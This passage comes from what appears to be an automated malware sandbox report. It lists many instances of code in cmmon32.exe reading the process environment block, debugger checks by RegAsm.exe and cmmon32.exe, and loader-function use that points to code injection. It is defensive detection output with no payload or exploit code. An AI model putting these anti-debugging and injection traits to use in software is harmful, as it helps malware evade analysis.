Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h] 23_2_04821C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h] 23_2_04821C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h] 23_2_04821C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h] 23_2_04821C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h] 23_2_04821C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h] 23_2_04821C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h] 23_2_04821C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h] 23_2_04821C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h] 23_2_04821C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h] 23_2_04821C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h] 23_2_04821C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h] 23_2_04821C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6CF0 mov eax, dword ptr fs:[00000030h] 23_2_047E6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6CF0 mov eax, dword ptr fs:[00000030h] 23_2_047E6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6CF0 mov eax, dword ptr fs:[00000030h] 23_2_047E6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0483740D mov eax, dword ptr fs:[00000030h] 23_2_0483740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0483740D mov eax, dword ptr fs:[00000030h] 23_2_0483740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0483740D mov eax, dword ptr fs:[00000030h] 23_2_0483740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477849B mov eax, dword ptr fs:[00000030h] 23_2_0477849B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478C577 mov eax, dword ptr fs:[00000030h] 23_2_0478C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478C577 mov eax, dword ptr fs:[00000030h] 23_2_0478C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04787D50 mov eax, dword ptr fs:[00000030h] 23_2_04787D50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048305AC mov eax, dword ptr fs:[00000030h] 23_2_048305AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048305AC mov eax, dword ptr fs:[00000030h] 23_2_048305AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A3D43 mov eax, dword ptr fs:[00000030h] 23_2_047A3D43
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E3540 mov eax, dword ptr fs:[00000030h] 23_2_047E3540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04794D3B mov eax, dword ptr fs:[00000030h] 23_2_04794D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04794D3B mov eax, dword ptr fs:[00000030h] 23_2_04794D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04794D3B mov eax, dword ptr fs:[00000030h] 23_2_04794D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h] 23_2_04773D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h] 23_2_04773D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h] 23_2_04773D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h] 23_2_04773D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h] 23_2_04773D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h] 23_2_04773D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h] 23_2_04773D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h] 23_2_04773D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h] 23_2_04773D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h] 23_2_04773D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h] 23_2_04773D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h] 23_2_04773D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h] 23_2_04773D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476AD30 mov eax, dword ptr fs:[00000030h] 23_2_0476AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047EA537 mov eax, dword ptr fs:[00000030h] 23_2_047EA537
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482FDE2 mov eax, dword ptr fs:[00000030h] 23_2_0482FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482FDE2 mov eax, dword ptr fs:[00000030h] 23_2_0482FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482FDE2 mov eax, dword ptr fs:[00000030h] 23_2_0482FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482FDE2 mov eax, dword ptr fs:[00000030h] 23_2_0482FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04818DF1 mov eax, dword ptr fs:[00000030h] 23_2_04818DF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477D5E0 mov eax, dword ptr fs:[00000030h] 23_2_0477D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477D5E0 mov eax, dword ptr fs:[00000030h] 23_2_0477D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04838D34 mov eax, dword ptr fs:[00000030h] 23_2_04838D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6DC9 mov eax, dword ptr fs:[00000030h] 23_2_047E6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6DC9 mov eax, dword ptr fs:[00000030h] 23_2_047E6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6DC9 mov eax, dword ptr fs:[00000030h] 23_2_047E6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6DC9 mov ecx, dword ptr fs:[00000030h] 23_2_047E6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6DC9 mov eax, dword ptr fs:[00000030h] 23_2_047E6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6DC9 mov eax, dword ptr fs:[00000030h] 23_2_047E6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482E539 mov eax, dword ptr fs:[00000030h] 23_2_0482E539
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04813D40 mov eax, dword ptr fs:[00000030h] 23_2_04813D40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04791DB5 mov eax, dword ptr fs:[00000030h] 23_2_04791DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04791DB5 mov eax, dword ptr fs:[00000030h] 23_2_04791DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04791DB5 mov eax, dword ptr fs:[00000030h] 23_2_04791DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047935A1 mov eax, dword ptr fs:[00000030h] 23_2_047935A1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479FD9B mov eax, dword ptr fs:[00000030h] 23_2_0479FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479FD9B mov eax, dword ptr fs:[00000030h] 23_2_0479FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04792581 mov eax, dword ptr fs:[00000030h] 23_2_04792581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04792581 mov eax, dword ptr fs:[00000030h] 23_2_04792581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04792581 mov eax, dword ptr fs:[00000030h] 23_2_04792581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04792581 mov eax, dword ptr fs:[00000030h] 23_2_04792581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04762D8A mov eax, dword ptr fs:[00000030h] 23_2_04762D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04762D8A mov eax, dword ptr fs:[00000030h] 23_2_04762D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04762D8A mov eax, dword ptr fs:[00000030h] 23_2_04762D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04762D8A mov eax, dword ptr fs:[00000030h] 23_2_04762D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04762D8A mov eax, dword ptr fs:[00000030h] 23_2_04762D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478AE73 mov eax, dword ptr fs:[00000030h] 23_2_0478AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478AE73 mov eax, dword ptr fs:[00000030h] 23_2_0478AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478AE73 mov eax, dword ptr fs:[00000030h] 23_2_0478AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478AE73 mov eax, dword ptr fs:[00000030h] 23_2_0478AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478AE73 mov eax, dword ptr fs:[00000030h] 23_2_0478AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477766D mov eax, dword ptr fs:[00000030h] 23_2_0477766D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04830EA5 mov eax, dword ptr fs:[00000030h] 23_2_04830EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04830EA5 mov eax, dword ptr fs:[00000030h] 23_2_04830EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04830EA5 mov eax, dword ptr fs:[00000030h] 23_2_04830EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04777E41 mov eax, dword ptr fs:[00000030h] 23_2_04777E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04777E41 mov eax, dword ptr fs:[00000030h] 23_2_04777E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04777E41 mov eax, dword ptr fs:[00000030h] 23_2_04777E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04777E41 mov eax, dword ptr fs:[00000030h] 23_2_04777E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04777E41 mov eax, dword ptr fs:[00000030h] 23_2_04777E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04777E41 mov eax, dword ptr fs:[00000030h] 23_2_04777E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0481FEC0 mov eax, dword ptr fs:[00000030h] 23_2_0481FEC0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04838ED6 mov eax, dword ptr fs:[00000030h] 23_2_04838ED6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476E620 mov eax, dword ptr fs:[00000030h] 23_2_0476E620
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479A61C mov eax, dword ptr fs:[00000030h] 23_2_0479A61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479A61C mov eax, dword ptr fs:[00000030h] 23_2_0479A61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476C600 mov eax, dword ptr fs:[00000030h] 23_2_0476C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476C600 mov eax, dword ptr fs:[00000030h] 23_2_0476C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476C600 mov eax, dword ptr fs:[00000030h] 23_2_0476C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04798E00 mov eax, dword ptr fs:[00000030h] 23_2_04798E00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821608 mov eax, dword ptr fs:[00000030h] 23_2_04821608
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047776E2 mov eax, dword ptr fs:[00000030h] 23_2_047776E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047916E0 mov ecx, dword ptr fs:[00000030h] 23_2_047916E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047936CC mov eax, dword ptr fs:[00000030h] 23_2_047936CC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A8EC7 mov eax, dword ptr fs:[00000030h] 23_2_047A8EC7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0481FE3F mov eax, dword ptr fs:[00000030h] 23_2_0481FE3F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482AE44 mov eax, dword ptr fs:[00000030h] 23_2_0482AE44
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482AE44 mov eax, dword ptr fs:[00000030h] 23_2_0482AE44
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E46A7 mov eax, dword ptr fs:[00000030h] 23_2_047E46A7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FFE87 mov eax, dword ptr fs:[00000030h] 23_2_047FFE87
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477FF60 mov eax, dword ptr fs:[00000030h] 23_2_0477FF60
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477EF40 mov eax, dword ptr fs:[00000030h] 23_2_0477EF40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478B73D mov eax, dword ptr fs:[00000030h] 23_2_0478B73D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478B73D mov eax, dword ptr fs:[00000030h] 23_2_0478B73D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479E730 mov eax, dword ptr fs:[00000030h] 23_2_0479E730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04764F2E mov eax, dword ptr fs:[00000030h] 23_2_04764F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04764F2E mov eax, dword ptr fs:[00000030h] 23_2_04764F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478F716 mov eax, dword ptr fs:[00000030h] 23_2_0478F716
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FFF10 mov eax, dword ptr fs:[00000030h] 23_2_047FFF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FFF10 mov eax, dword ptr fs:[00000030h] 23_2_047FFF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479A70E mov eax, dword ptr fs:[00000030h] 23_2_0479A70E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479A70E mov eax, dword ptr fs:[00000030h] 23_2_0479A70E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0483070D mov eax, dword ptr fs:[00000030h] 23_2_0483070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0483070D mov eax, dword ptr fs:[00000030h] 23_2_0483070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A37F5 mov eax, dword ptr fs:[00000030h] 23_2_047A37F5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04778794 mov eax, dword ptr fs:[00000030h] 23_2_04778794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04838F6A mov eax, dword ptr fs:[00000030h] 23_2_04838F6A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E7794 mov eax, dword ptr fs:[00000030h] 23_2_047E7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E7794 mov eax, dword ptr fs:[00000030h] 23_2_047E7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E7794 mov eax, dword ptr fs:[00000030h] 23_2_047E7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04780050 mov eax, dword ptr fs:[00000030h] 23_2_04780050
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04780050 mov eax, dword ptr fs:[00000030h] 23_2_04780050
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478A830 mov eax, dword ptr fs:[00000030h] 23_2_0478A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478A830 mov eax, dword ptr fs:[00000030h] 23_2_0478A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478A830 mov eax, dword ptr fs:[00000030h] 23_2_0478A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478A830 mov eax, dword ptr fs:[00000030h] 23_2_0478A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479002D mov eax, dword ptr fs:[00000030h] 23_2_0479002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479002D mov eax, dword ptr fs:[00000030h] 23_2_0479002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479002D mov eax, dword ptr fs:[00000030h] 23_2_0479002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479002D mov eax, dword ptr fs:[00000030h] 23_2_0479002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479002D mov eax, dword ptr fs:[00000030h] 23_2_0479002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477B02A mov eax, dword ptr fs:[00000030h] 23_2_0477B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477B02A mov eax, dword ptr fs:[00000030h] 23_2_0477B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477B02A mov eax, dword ptr fs:[00000030h] 23_2_0477B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477B02A mov eax, dword ptr fs:[00000030h] 23_2_0477B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E7016 mov eax, dword ptr fs:[00000030h] 23_2_047E7016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E7016 mov eax, dword ptr fs:[00000030h] 23_2_047E7016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E7016 mov eax, dword ptr fs:[00000030h] 23_2_047E7016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04834015 mov eax, dword ptr fs:[00000030h] 23_2_04834015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04834015 mov eax, dword ptr fs:[00000030h] 23_2_04834015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047640E1 mov eax, dword ptr fs:[00000030h] 23_2_047640E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047640E1 mov eax, dword ptr fs:[00000030h] 23_2_047640E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047640E1 mov eax, dword ptr fs:[00000030h] 23_2_047640E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047658EC mov eax, dword ptr fs:[00000030h] 23_2_047658EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478B8E4 mov eax, dword ptr fs:[00000030h] 23_2_0478B8E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478B8E4 mov eax, dword ptr fs:[00000030h] 23_2_0478B8E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FB8D0 mov eax, dword ptr fs:[00000030h] 23_2_047FB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FB8D0 mov ecx, dword ptr fs:[00000030h] 23_2_047FB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FB8D0 mov eax, dword ptr fs:[00000030h] 23_2_047FB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FB8D0 mov eax, dword ptr fs:[00000030h] 23_2_047FB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FB8D0 mov eax, dword ptr fs:[00000030h] 23_2_047FB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FB8D0 mov eax, dword ptr fs:[00000030h] 23_2_047FB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479F0BF mov ecx, dword ptr fs:[00000030h] 23_2_0479F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479F0BF mov eax, dword ptr fs:[00000030h] 23_2_0479F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479F0BF mov eax, dword ptr fs:[00000030h] 23_2_0479F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A90AF mov eax, dword ptr fs:[00000030h] 23_2_047A90AF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h] 23_2_047920A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h] 23_2_047920A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h] 23_2_047920A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h] 23_2_047920A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h] 23_2_047920A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h] 23_2_047920A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04822073 mov eax, dword ptr fs:[00000030h] 23_2_04822073
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04769080 mov eax, dword ptr fs:[00000030h] 23_2_04769080
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04831074 mov eax, dword ptr fs:[00000030h] 23_2_04831074
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E3884 mov eax, dword ptr fs:[00000030h] 23_2_047E3884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E3884 mov eax, dword ptr fs:[00000030h] 23_2_047E3884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476B171 mov eax, dword ptr fs:[00000030h] 23_2_0476B171
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476B171 mov eax, dword ptr fs:[00000030h] 23_2_0476B171
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476C962 mov eax, dword ptr fs:[00000030h] 23_2_0476C962
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048249A4 mov eax, dword ptr fs:[00000030h] 23_2_048249A4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048249A4 mov eax, dword ptr fs:[00000030h] 23_2_048249A4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048249A4 mov eax, dword ptr fs:[00000030h] 23_2_048249A4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048249A4 mov eax, dword ptr fs:[00000030h] 23_2_048249A4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478B944 mov eax, dword ptr fs:[00000030h] 23_2_0478B944
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478B944 mov eax, dword ptr fs:[00000030h] 23_2_0478B944
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479513A mov eax, dword ptr fs:[00000030h] 23_2_0479513A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479513A mov eax, dword ptr fs:[00000030h] 23_2_0479513A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04784120 mov eax, dword ptr fs:[00000030h] 23_2_04784120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04784120 mov eax, dword ptr fs:[00000030h] 23_2_04784120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04784120 mov eax, dword ptr fs:[00000030h] 23_2_04784120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04784120 mov eax, dword ptr fs:[00000030h] 23_2_04784120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04784120 mov ecx, dword ptr fs:[00000030h] 23_2_04784120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04769100 mov eax, dword ptr fs:[00000030h] 23_2_04769100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04769100 mov eax, dword ptr fs:[00000030h] 23_2_04769100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04769100 mov eax, dword ptr fs:[00000030h] 23_2_04769100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047F41E8 mov eax, dword ptr fs:[00000030h] 23_2_047F41E8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476B1E1 mov eax, dword ptr fs:[00000030h] 23_2_0476B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476B1E1 mov eax, dword ptr fs:[00000030h] 23_2_0476B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476B1E1 mov eax, dword ptr fs:[00000030h] 23_2_0476B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E51BE mov eax, dword ptr fs:[00000030h] 23_2_047E51BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E51BE mov eax, dword ptr fs:[00000030h] 23_2_047E51BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E51BE mov eax, dword ptr fs:[00000030h] 23_2_047E51BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E51BE mov eax, dword ptr fs:[00000030h] 23_2_047E51BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov eax, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov eax, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov eax, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h] 23_2_047899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047899BF mov ecx, dword ptr fs:[00000030h] 23_2_047899BF
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA9A20 NtResumeThread,LdrInitializeThunk, 9_2_02BA9A20

